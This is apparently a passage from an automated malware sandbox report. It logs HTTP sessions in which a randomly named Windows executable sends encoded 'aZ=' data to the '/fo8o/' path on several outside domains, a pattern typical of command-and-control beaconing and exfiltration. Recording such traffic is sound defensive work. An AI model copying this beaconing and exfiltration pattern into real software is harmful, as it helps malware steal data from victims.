aZ=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhu3TmwMaqQmtLCpTU7xKGKP3HcqvykTiEiH6FDFj5Jcasr+T0YwLQ+63scTh2EfTsYnJxSsL0iqpX0x3KMDZuOQ8XdUDX9ahgBeBsj8nqth/skcqsLuQ+1mOs9JQJNfUA6Mhs29xlshdtuoGzsmXQupmdSO/oGT3Vgd2324a91k53tI0Jws9/rVsbP3tlS+hge466nemxKhCLoFSjUjve6J7CjcLk7CFwGpXz+l3cB7friBjuR5Zuy3du3b5vDDVuXEvyLtum9Es/4byXUgFcim6jhKS68fuBAb47Mmsz7dA6jsQTzKMUjGSoJdqV3EzZyCggY0Bh4iPiGAL3NldetnUQVL1Yjr4GYrd7XU6TDj35BzBTEYpMolA5ZCcT4SWFA+bUtmDJlg30J55XkZSmCbX/qwbKM9Ka3+Tj/fgA+CRtRd/gpkHDrHTYGV8DkPdFiQFphPsb/FQ2S01B9N4/U0wPnJa2KS/+NUJwcmEDWFod/UQ1ELvm0gWWXefqzZHNV2caLnfrPufUZ0QkAEwkca/x02C50CIJi85NeItp2if3s2ZW0DGDO6oFier+nhjfA6mRuoue9nqL80pZwh+2SvcEPDIpTOX9Qmo4DfC+GxeMxoEVI26LQf43JpeSoIFqGOSe/2pX3pW0KFN8k/ZwesIb1LpAuRxDE4pdXGAuUuHfs9ixlfN9YpWSzabXEqJUVTJ+CsUb2SRay3eaJPw51205OfbfzEr+yDbNQuHYeYtlEw9B+fGz7kDEnk7C9ElJC5kAHGhuhCBKHHyQhFMehTadkXcDDEgIRZeaF+VaKnQwNxi2spf1vuWNMkale/2RQ8EiUZt [TRUNCATED]
Jun 8, 2024 18:15:48.700429916 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Sat, 08 Jun 2024 16:15:48 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-06-08T16:15:53.5609652Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49754	85.159.66.93	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:15:50.286417961 CEST	498	OUT	GET /fo8o/?qD=FrMTb&aZ=qL3nKp+YSjoaTomnOzyxpXPFUBhLgkHGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKFgJSPFkq5dbaCOx4WcoETVBbNsEZyvIPzk= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.magmadokum.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jun 8, 2024 18:15:51.334306002 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Sat, 08 Jun 2024 16:15:51 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-06-08T16:15:56.0636698Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49755	91.195.240.94	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:15:56.395760059 CEST	776	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 199 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 70 76 46 46 63 4e 4d 51 30 41 59 42 79 74 58 32 74 6a 4b 75 55 42 44 76 36 51 5a 4a 63 54 72 68 51 67 3d 3d Data Ascii: aZ=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8pvFFcNMQ0AYBytX2tjKuUBDv6QZJcTrhQg==
Jun 8, 2024 18:15:57.317339897 CEST	707	IN	HTTP/1.1 405 Not Allowed date: Sat, 08 Jun 2024 16:15:57 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49756	91.195.240.94	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:15:58.940135956 CEST	796	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 219 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 6e 63 6e 58 51 39 52 51 57 6f 4c 68 64 68 6d 61 57 52 71 4e 62 73 30 53 75 50 4c 32 79 62 34 51 38 3d Data Ascii: aZ=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBncnXQ9RQWoLhdhmaWRqNbs0SuPL2yb4Q8=
Jun 8, 2024 18:15:59.785556078 CEST	707	IN	HTTP/1.1 405 Not Allowed date: Sat, 08 Jun 2024 16:15:59 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49757	91.195.240.94	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:16:01.471256971 CEST	10878	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10299 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 45 42 31 63 4c 75 6d 78 6a 67 59 41 33 54 30 33 6f 6d 56 6a 6d 6f 4b 79 67 5a 33 61 75 4a 31 66 71 45 79 69 50 6e 5a 53 4f 6d 6d 77 4e 56 51 65 68 4f 31 37 46 72 4f 37 79 4c 69 6c 5a 7a 4c 42 67 59 42 57 70 6b 47 69 6b 79 6e 4c 70 48 68 2f 7a 38 56 70 48 30 31 5a 43 30 31 41 4f 61 46 67 41 43 78 48 4b 39 42 72 38 6c 68 59 4a 54 48 2b 63 51 75 54 50 63 73 77 44 4f 61 77 57 72 65 57 4c 5a 52 4f 62 34 4f 51 4b 44 67 58 4f 70 41 7a 79 72 4d 76 4e 36 69 72 51 71 46 6a 42 68 48 72 55 64 47 2b 49 [TRUNCATED] Data Ascii: aZ=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMoQ84+HaiplMLXyt/hmJnRFi9H/fWCV0fJvsRDLx6lH1p0zlX6NMlq38BEIWXFlAlX0L24fshsKxVlJfX9AA+MIUhZ9So9ITzDTaXkl14qKvkEl4KLHs5uRgds5UM4u8iEB1cLumxjgYA3T03omVjmoKygZ3auJ1fqEyiPnZSOmmwNVQehO17FrO7yLilZzLBgYBWpkGikynLpHh/z8VpH01ZC01AOaFgACxHK9Br8lhYJTH+cQuTPcswDOawWreWLZROb4OQKDgXOpAzyrMvN6irQqFjBhHrUdG+IfBSNHSw7v+5bGEfkwDUsG9V5WGoC8+lR/xvv5niBHs5YxnNEvaYLO5HaaXzr9Yoi2eNK/mdKdDN+RzeKqs47wiqJPC1ch3USWoPC2f24K9QCdu1AgunazsdP+QpazQx7ROXqz+lwJKNZe1kvu/mxYEQfuN9kDrDcltTEHs/QZJEUzYvBM6bQMuPz1dVQDMpPWMz/pduf5vOWC2xUc3fv3IBc7OeUD7MIk0bf9Gbm+VO95HMSMAUe3tB+KdjVkVILNTrcl4P4HGW2E+u48IR+g1ays+RI/C1NBPJwVSCGAYSflKEdDQBKYWPtT2CERNvS+q2+Z7hUDmlvZrTzNm2Xa5KVKa1Co/3jN8MoOr7PfQ9Ia5yGc9dX0kFiKjsKUxE/Vp034fjrgGf9Mkg85IeCp+cob6ky3EsKMYZRr5JOnBPv4sN4v9yE4ndesPT8b8SoR6UgELJDvJDVi/IhvwyqS2mqOgKwAIreImiSDx0GiMs4qDzJw5y0zfSaRYkLSbz1s7AuiTEa1VmruK0xGZNeu6oOxQ587MegUgAtQ8J0kU9gVp6LCofjZX6p/d/Sn2hXihM9v1sm4iR2/t0BqhfxFWHV9Cy56ml/sLPWr4/1az18opf8DsZa1q68AlxVyJil3gJlvL/2Qi+kje9jUQzWqR8g3SLA60YIie [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49758	91.195.240.94	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:16:04.000262976 CEST	499	OUT	GET /fo8o/?aZ=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&qD=FrMTb HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.rssnewscast.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jun 8, 2024 18:16:05.203635931 CEST	1236	IN	HTTP/1.1 200 OK date: Sat, 08 Jun 2024 16:16:05 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_GE9GnWbxpNv3s0xi1sg/pGe7fG3vvvRe/zd5HXU+SjcPHxnnz0FBXBAd1lBYI1C/1jxfAtTJ/q1knWl+G6K4oA== last-modified: Sat, 08 Jun 2024 16:16:05 GMT x-cache-miss-from: parking-7dd9875bc6-gjztt server: Parking/1.0 connection: close Data Raw: 32 45 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 47 45 39 47 6e 57 62 78 70 4e 76 33 73 30 78 69 31 73 67 2f 70 47 65 37 66 47 33 76 76 76 52 65 2f 7a 64 35 48 58 55 2b 53 6a 63 50 48 78 6e 6e 7a 30 46 42 58 42 41 64 31 6c 42 59 49 31 43 2f 31 6a 78 66 41 74 54 4a 2f 71 31 6b 6e 57 6c 2b 47 36 4b 34 6f 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED] Data Ascii: 2E2<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_GE9GnWbxpNv3s0xi1sg/pGe7fG3vvvRe/zd5HXU+SjcPHxnnz0FBXBAd1lBYI1C/1jxfAtTJ/q1knWl+G6K4oA==><head><meta charset="utf-8"><title>rssnewscast.com - rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informati
Jun 8, 2024 18:16:05.203660011 CEST	1236	IN	Data Raw: 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 Data Ascii: on youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are search1062ing for!"><link rel="icon" type="image/png" href="//img
Jun 8, 2024 18:16:05.203670979 CEST	1236	IN	Data Raw: 69 6e 65 2d 68 65 69 67 68 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a Data Ascii: ine-height:0;position:relative;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,se
Jun 8, 2024 18:16:05.203682899 CEST	1236	IN	Data Raw: 63 68 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 3a 3a 2d 77 65 62 6b 69 74 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 62 75 74 74 6f Data Ascii: ch]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:
Jun 8, 2024 18:16:05.203694105 CEST	848	IN	Data Raw: 6d 69 6e 2d 68 65 69 67 68 74 3a 38 32 30 70 78 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 7b 70 61 64 64 69 6e 67 3a 30 20 30 20 31 2e 36 65 6d 20 30 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 Data Ascii: min-height:820px}.two-tier-ads-list{padding:0 0 1.6em 0}.two-tier-ads-list__list-element{list-style:none;padding:10px 0 5px 0;display:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images/bulle
Jun 8, 2024 18:16:05.203743935 CEST	1236	IN	Data Raw: 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 66 6f 63 75 73 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a Data Ascii: t-element-link:active,.two-tier-ads-list__list-element-link:focus{text-decoration:none}.webarchive-block{text-align:center}.webarchive-block__header-link{color:#0a48ff;font-size:20px}.webarchive-block__list{padding:0}.webarchive-block__list-el
Jun 8, 2024 18:16:05.203758001 CEST	1236	IN	Data Raw: 72 3a 30 20 6e 6f 6e 65 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 65 61 72 63 68 62 6f 78 5f 5f 62 75 74 74 6f 6e 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 35 Data Ascii: r:0 none}.container-searchbox__button{cursor:pointer;font-size:12px;margin-left:15px;border:0 none;padding:2px 8px;color:#638296}.container-disclaimer{text-align:center}.container-disclaimer__content{display:inline-block}.container-disclaimer_
Jun 8, 2024 18:16:05.203768015 CEST	1236	IN	Data Raw: 20 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 2d 68 65 61 64 65 72 2c 2e 63 6f 6e 74 61 69 Data Ascii: 15px;font-size:10px}.container-cookie-message__content-interactive-header,.container-cookie-message__content-interactive-text{color:#fff}.container-cookie-message__content-interactive-header{font-size:small}.container-cookie-message__content-
Jun 8, 2024 18:16:05.203809977 CEST	1236	IN	Data Raw: 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 6d 61 72 67 69 6e 3a 35 70 78 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 33 73 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 73 7b 62 61 63 6b 67 72 6f Data Ascii: ext-decoration:none;cursor:pointer;margin:5px;transition:.3s}.btn--success{background-color:#218838;border-color:#218838;color:#fff;font-size:x-large}.btn--success:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:x-larg
Jun 8, 2024 18:16:05.203820944 CEST	848	IN	Data Raw: 65 72 2d 2d 72 6f 75 6e 64 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 34 70 78 7d 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 2d 2d 72 6f 75 6e 64 3a 62 65 66 6f 72 65 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 7d 69 6e 70 75 74 Data Ascii: er--round{border-radius:34px}.switch__slider--round:before{border-radius:50%}input:checked+.switch__slider{background-color:#007bff}input:focus+.switch__slider{box-shadow:0 0 1px #007bff}input:checked+.switch__slider:before{-webkit-transform:t
Jun 8, 2024 18:16:05.208862066 CEST	1236	IN	Data Raw: 6d 22 2c 22 61 64 62 6c 6f 63 6b 6b 65 79 22 3a 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 Data Ascii: m","adblockkey":" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_GE9GnWbxpNv3s0xi1sg/pGe7fG3vvvRe/zd5HXU+SjcPHxnnz0FBXBAd1lBYI1C/1jxfAtTJ/q1knWl+

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49759	66.29.149.46	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:16:18.614746094 CEST	776	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 199 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 